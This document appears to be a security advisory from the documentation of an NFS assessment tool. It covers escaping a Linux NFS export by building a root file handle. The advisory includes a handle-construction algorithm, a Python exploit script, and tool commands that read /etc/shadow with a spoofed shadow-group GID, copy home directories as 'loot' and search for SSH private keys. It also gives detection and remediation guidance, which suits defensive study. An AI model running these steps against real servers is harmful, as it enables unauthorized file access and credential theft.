F-2.1: Export Escape via Filesystem Root Handle¶
Classification¶
- Severity: Critical
- CVSS Vector: Network / Low Complexity / No Auth Required
- Affected Versions: NFSv2, NFSv3, and NFSv4 on Linux
- Configuration:
no_subtree_check(default on Linux since kernel 2.6.25) - Prerequisite: Export is not the root of its filesystem, server runs Linux
- RFC Basis: RFC 1094 §2.3.3, RFC 1813 §3.3.3, RFC 2623 §2.6
Summary¶
When subtree_check is disabled (the default on Linux), the NFS server only verifies that a requested file handle belongs to the correct filesystem, not that it resides within the exported directory tree. An attacker who can mount any export on a filesystem can craft file handles to access any file on the same filesystem, including system files like /etc/shadow, regardless of what directory was originally exported.
This is the single most impactful NFS finding — it converts any NFS export into full filesystem access.
RFC rationale¶
Why the protocol allows this¶
File handles are opaque, server-defined tokens (RFC 1094 §2.3.3):
"The file handle can contain whatever information the server needs to distinguish an individual file."
The RFC does NOT require the server to validate that a handle falls within the exported subtree. The only mount-boundary protection is for LOOKUP:
"A server will not allow a LOOKUP operation to cross a mountpoint." — RFC 1813 §3.3.3
But this says nothing about constructed handles pointing to inodes outside the export on the SAME filesystem. The server checks that the handle's filesystem ID matches an exported filesystem — not that the inode is within the export path.
File handles are bearer tokens — possession grants access (RFC 2623 §2.6):
"An attacker can circumvent the MOUNT server's access control to gain access to a file system that the attacker is not authorized for. The circumvention is accomplished by either stealing a file handle (usually by snooping the network traffic between a legitimate client and server) or guessing a file handle."
The export escape is a special case of "guessing a file handle" — the root inode number is deterministic per filesystem type, making the guess trivial.
No handle MAC or signing — Neither RFC 1094 nor RFC 1813 requires cryptographic protection on handles. Only Windows NFS adds optional HMAC (see F-2.3).
Handles never expire (RFC 1094 Appendix A):
"The mount list information is not critical for the correct functioning of either the client or the server. It is intended for advisory use only."
Once constructed, the escape handle works indefinitely.
Why subtree_check is disabled by default¶
From man 5 exports:
"subtree checking ... can cause problems when a file is renamed while a client has it open. It is also rather confusing for many people."
Linux disables it by default for reliability, creating the security gap. When enabled, the server walks the directory tree from each requested inode up to the export root on every operation — expensive and causes ESTALE errors when files are renamed or moved.
Technical detail¶
Linux knfsd file handle structure¶
NFS file handles on Linux follow the knfsd_fh format:
struct knfsd_fh {
uint8_t fh_version; // always 1 for knfsd
uint8_t fh_auth_type; // always 0
uint8_t fh_fsid_type; // filesystem ID encoding (0-7)
uint8_t fh_fileid_type; // file ID encoding (see table below)
uint8_t fh_fsid[...]; // filesystem identifier (variable length)
uint8_t fh_fileid[...]; // inode + generation number
};
The first four bytes are the header. fh_fsid_type determines how the filesystem is identified, and fh_fileid_type determines how the file within that filesystem is identified.
fsid_type encodings (bytes 2)¶
The fh_fsid_type byte determines the fsid format and its length:
| fsid_type | Length | Encoding | Description |
|---|---|---|---|
| 0 | 8 bytes | dev major:minor + export inode | Most common (ext4 default) |
| 1 | 4 bytes | dev number only | Compact device ID |
| 2 | 12 bytes | dev + UUID prefix | Device + partial UUID |
| 3 | 8 bytes | dev:minor pair (alt) | Alternative device encoding |
| 4 | 8 bytes | dev + export UUID | Device + export identifier |
| 5 | 8 bytes | UUID prefix (8 bytes) | Filesystem UUID truncated |
| 6 | 16 bytes | Full 16-byte UUID | XFS and other UUID-native FS |
| 7 | 24 bytes | UUID + inode + generation | Extended UUID-based (XFS) |
The fsid uniquely identifies which filesystem the handle belongs to. The server validates that the fsid in a handle matches an exported filesystem. This is the only validation when subtree_check is disabled.
fileid_type encodings (byte 3)¶
The fh_fileid_type byte identifies the file within the filesystem:
| fileid_type | Filesystem | Meaning |
|---|---|---|
| 0 | All | Filesystem root handle |
| 1 | ext4 | Directory (inode + gen) |
| 2 | ext4 | File (inode + gen + parent inode + parent gen) |
| 0x4d | BTRFS | Subvolume file/dir (subvol_id + inode + gen) |
| 0x4e | BTRFS | Subvolume dir with parent |
| 0x4f | BTRFS | Subvolume root |
| 0x51 | UDF | File/directory |
| 0x52 | UDF | Directory with parent |
| 0x61 | NILFS2 | File/directory |
| 0x62 | NILFS2 | Directory with parent |
| 0x71 | FAT | File/directory |
| 0x72 | FAT | Directory with parent |
| 0x81 | ext4 | 64-bit inode variant |
| 0x97 | Lustre | File/directory |
| 0xfe | kernfs | Pseudo-filesystem |
| 0xff | — | Invalid/reserved |
Root inode numbers by filesystem¶
The key insight: the filesystem root directory always has a known, deterministic inode number:
| Filesystem | Root Inode | Generation | Escape Complexity |
|---|---|---|---|
| ext4 | 2 | Usually 0 | Trivial — deterministic |
| xfs | 128 (or 64 on older) | Usually 0 | Trivial — deterministic |
| BTRFS | 256 (subvolume root) | 0 | Trivial — plus cross-subvolume access |
| ZFS | Varies per dataset | Varies | High — per-dataset isolation, needs brute-force |
| UFS (FreeBSD) | 2 | arc4random | Infeasible — 32-bit random generation |
Escape handle construction algorithm¶
This is the algorithm implemented in nfswolf:
1. Mount export → receive export_fh
2. READDIRPLUS(export_fh) → get child handles, detect fileid_type → identify filesystem
3. Check: if export's inode is already the root (inode 2 or 128) → abort (already at root)
4. Extract fsid_type from export_fh[2], look up fsid_len
5. Copy fsid bytes from export_fh
For ext4/xfs:
6a. Set fileid_type = 0x02 (file type, not root type — root type 0 has different semantics)
6b. Set fileid = [inode=2, gen=0, parent_inode=2, parent_gen=0] (ext4)
OR fileid = [inode=128, gen=0, parent_inode=128, parent_gen=0] (xfs)
6c. Try both if filesystem type is unknown
For BTRFS:
6a. Set fileid_type = 0x4d (BTRFS subvolume)
6b. Iterate subvolume IDs (256, 257, 258, ...) — each is a separate subvolume
6c. Construct: [subvol_objectid=256, subvol_id=0, inode=256+i, gen=0]
7. Send READDIRPLUS(constructed_handle) → if it returns entries, escape succeeded
8. CONFIRM: Compare child count of escape listing vs export listing — they should differ
(escape has more entries since it's the whole filesystem root)
The ext4 escape handle (byte-level)¶
Given an export handle starting with:
01 00 00 02 # version=1, auth=0, fsid_type=0, fileid_type=2
xx xx xx xx xx xx xx xx # fsid (8 bytes: dev major:minor + export inode)
The escape handle replaces everything after fsid:
01 00 00 02 # version=1, auth=0, fsid_type=0, fileid_type=2
[ same 8 fsid bytes ] # keep filesystem identity
02 00 00 00 # inode = 2 (ext4 root), little-endian
00 00 00 00 # generation = 0
02 00 00 00 # parent inode = 2 (root's parent is itself)
00 00 00 00 # parent generation = 0
Escape confirmation technique¶
A successful escape is confirmed by comparing READDIRPLUS results:
- READDIRPLUS on the export handle returns files in
/srv/share/(e.g., 15 entries) - READDIRPLUS on the escape handle returns files in
/(e.g., 25 entries:bin,etc,home,var, ...) - If the escape listing has significantly more entries and different names → confirmed
For NFSv4, the comparison uses the directory entry set difference:
# If the escape directory has >3 more entries than the export directory,
# and contains system directories not in the export → escape confirmed
if abs(len(escape_dir) - len(export_dir)) > 3:
return True # confirmed escape
The handle oracle (NFS3ERR_BADHANDLE vs NFS3ERR_STALE)¶
When a constructed handle is rejected, the error code reveals why (RFC 1813 §2.6):
-
NFS3ERR_BADHANDLE (10001): "The file handle failed internal consistency checks" — the handle FORMAT is wrong. Try a different fsid_type or fileid_type encoding.
-
NFS3ERR_STALE (70): "The file handle refers to a file or directory that no longer exists" — the handle FORMAT is correct, but the inode/generation doesn't match an existing file. The fsid is correct. Try different inode numbers or generation values.
This oracle is invaluable: STALE tells the attacker they've guessed the correct handle structure and only need to vary the inode/generation fields.
Attack flow¶
1. Mount legitimate export (e.g., /srv/share)
2. READDIRPLUS → detect filesystem type from child handle fileid_types
3. Extract fsid from the export's file handle
4. Check if export inode == root inode → if so, already have full access
5. Construct handle: same fsid, root inode (2 for ext4, 128 for xfs)
6. READDIRPLUS on constructed handle → filesystem root listing
7. Confirm escape via child count comparison
8. LOOKUP etc → LOOKUP shadow → READ shadow_fh with GID 42 (Debian) or GID 15 (SUSE)
9. Full filesystem access achieved
Exploitation¶
Automated: nfswolf¶
# Analyze — automatically attempts escape on all exports
nfswolf analyze target
# Step 1: get the root handle for the underlying filesystem
HANDLE=$(nfswolf escape target:/srv --json | jq -r .root_handle)
# Step 2: read /etc/shadow with the Debian shadow GID (shell on the handle)
nfswolf --gid 42 shell target --handle "$HANDLE"
nfs> cat /etc/shadow
# Step 2 (alt): mount the constructed handle locally
nfswolf mount target /mnt/escaped --handle "$HANDLE"
# Step 2 (alt): recursively pull files off the escaped filesystem
nfswolf shell target --handle "$HANDLE"
nfs> get -r /home ./loot/home
The /etc/shadow trick (Debian/SUSE)¶
Even with root_squash enabled (UID 0 blocked), /etc/shadow is readable on Debian-based systems:
# On Debian/Ubuntu:
ls -la /etc/shadow
# -rw-r----- 1 root shadow 1421 Feb 19 17:48 /etc/shadow
# ^^^^^^
# Group: shadow (GID 42) — NOT GID 0!
Since root_squash only blocks UID 0 and GID 0, an attacker can read /etc/shadow by claiming GID 42 (see F-1.3: Auxiliary Group Injection):
# Set credential to GID 42 (shadow group on Debian)
credential = AUTH_SYS(0, "host", 65534, 42, [42])
# Now read /etc/shadow through the escaped handle
data = await client.read(shadow_fh, 0, 65536)
Distribution-specific shadow GIDs:
| Distribution | /etc/shadow Group | GID |
|---|---|---|
| Debian/Ubuntu | shadow | 42 |
| SUSE/openSUSE | shadow | 15 |
| RHEL/Fedora | root | 0 (blocked by root_squash) |
| Arch Linux | root | 0 (blocked by root_squash) |
Manual: constructing the escape handle (Python)¶
import struct
import binascii
# From the export's file handle (obtained via MOUNT)
export_fh = bytearray.fromhex("0100000265ac0a000000000019548b48d914438cbec47a14f9b26726")
# Parse header
fh_version = export_fh[0] # 0x01 (must be 1 for Linux knfsd)
fh_auth = export_fh[1] # 0x00
fh_fsid_type = export_fh[2] # 0x00 = dev major:minor (8-byte fsid)
fh_fileid_type = export_fh[3] # current file type
# Look up fsid length
fsid_lens = {0: 8, 1: 4, 2: 12, 3: 8, 4: 8, 5: 8, 6: 16, 7: 24}
fsid_len = fsid_lens[fh_fsid_type]
# Extract fsid (filesystem identity)
fsid = export_fh[4:4 + fsid_len]
# Construct ext4 root handle
# fileid for root: inode=2, gen=0, parent_inode=2, parent_gen=0
root_fh = bytearray([0x01, 0x00, fh_fsid_type, 0x02]) # version, auth, fsid_type, fileid_type=2
root_fh.extend(fsid)
root_fh.extend(struct.pack("<I", 2)) # inode 2 (ext4 root)
root_fh.extend(struct.pack("<I", 0)) # generation 0
root_fh.extend(struct.pack("<I", 2)) # parent inode 2
root_fh.extend(struct.pack("<I", 0)) # parent generation 0
# If ext4 fails, try xfs (inode 128)
xfs_root_fh = bytearray([0x01, 0x00, fh_fsid_type, 0x02])
xfs_root_fh.extend(fsid)
xfs_root_fh.extend(struct.pack("<I", 128)) # inode 128 (xfs root)
xfs_root_fh.extend(struct.pack("<I", 0))
xfs_root_fh.extend(struct.pack("<I", 128))
xfs_root_fh.extend(struct.pack("<I", 0))
# Use READDIRPLUS to verify escape
# NFS3_OK → escaped
# NFS3ERR_STALE → correct format, wrong inode/gen (try other values)
# NFS3ERR_BADHANDLE → wrong format (try different fsid_type)
Mounting the escaped filesystem with FUSE¶
# Get the root file handle from nfswolf analyze output
ROOT_FH="0100000265ac0a00..."
# Mount the entire filesystem using the escaped handle
nfswolf mount target /mnt/escaped --handle "$ROOT_FH"
# Now browse the entire filesystem
ls /mnt/escaped/etc/
cat /mnt/escaped/etc/shadow
find /mnt/escaped/home -name "id_rsa" -type f
Filesystem-specific behavior¶
| Filesystem | Root Inode | fileid_type | Escape Complexity | Notes |
|---|---|---|---|---|
| ext4 | 2 | 0x02 | Trivial | Generation number usually 0; most common |
| xfs | 128 (or 64) | 0x02 | Trivial | fsid_type often 6 or 7 (UUID-based) |
| BTRFS | 256 | 0x4d | Trivial | Cross-subvolume access; see F-2.4 |
| ZFS | Varies | Varies | High | Per-dataset isolation; handle brute-force needed |
| FreeBSD UFS | 2 | — | Infeasible | 32-bit arc4random generation number |
BTRFS cross-subvolume access¶
On BTRFS, escape enables access to ALL subvolumes and snapshots (see F-2.4):
btrfs subvolume list /
# ID 256 gen 100 top level 5 path @
# ID 257 gen 99 top level 5 path @home
# ID 258 gen 50 top level 5 path @snapshots/daily-2024-01-01
Each subvolume has a predictable root inode, enabling access to snapshot data that may contain older versions of sensitive files.
Related findings¶
| Finding | Relationship |
|---|---|
| F-2.4: BTRFS Subvolume Escape | BTRFS-specific extension of export escape |
| F-2.6: Bind Mount Escape | Bind mounts share the same fsid — escape works through them |
| F-1.3: Auxiliary Group Injection | Shadow GID trick to read /etc/shadow after escape |
| F-1.1: UID/GID Spoofing | Credential forgery to access files found via escape |
| F-5.2: READDIRPLUS Harvesting | READDIRPLUS harvests handles for all files at escape root |
| F-2.2: File Handle Guessing | Generalized version; escape is a special case with known inode |
| F-7.6: No Audit Logging | Escape operations leave no server-side logs |
Impact¶
- Full filesystem read access — not just the exported directory
- /etc/shadow extraction on Debian/SUSE systems (GID 42/15 trick)
- SSH key theft from user home directories (
/home/*/.ssh/id_rsa) - Web shell upload via
/var/www/(if combined with write access) - Log access via
/var/log/for intelligence gathering - Configuration exposure: database credentials, API keys, certificates
- Snapshot data exposure on BTRFS (potentially deleted/old sensitive data)
- Combined with F-4.1: If
no_root_squashis also set, escape + write = full server compromise
Detection¶
- No server-side logs differentiate escaped access from legitimate access (F-7.6)
- Network-level detection would require tracking which file handles correspond to which exported directories (impractical at scale)
- File integrity monitoring (AIDE, Tripwire) on the server could detect unauthorized modifications
- eBPF/bpftrace tracing of knfsd could log inode access outside export boundaries (custom, high overhead)
Remediation¶
-
Make each export the root of its own filesystem (most effective):
-
Enable subtree_check (if a separate filesystem isn't possible):
Warning: CausesESTALEerrors when files are renamed while open. -
Use bind mounts cautiously — they do NOT provide isolation (see F-2.6). The underlying filesystem is still accessible because bind mounts share the same fsid.
-
On BTRFS, always enable
subtree_checkif other subvolumes contain sensitive data. -
Restrict shadow group access — set
/etc/shadowtoroot:rootownership (as RHEL does) instead ofroot:shadow. -
Use Kerberos (
sec=krb5) — while it doesn't prevent escape, it prevents the UID/GID spoofing needed to read files after escaping (assuming the attacker doesn't have a valid Kerberos ticket for a privileged user).
nfswolf implementation¶
The escape logic is in src/engine/file_handle.rs:
- FileHandleAnalyzer::construct_escape_handle() — auto-detect FS type and construct root handle
- FileHandleAnalyzer::construct_handle_for_inode() — generic primitive for arbitrary inode targeting
- FileHandleAnalyzer::construct_btrfs_subvol_handles() — BTRFS subvolume enumeration
- FileHandleAnalyzer::fingerprint_fs() — filesystem detection from fileid_type
- FileHandleAnalyzer::fingerprint_os() — OS detection from handle format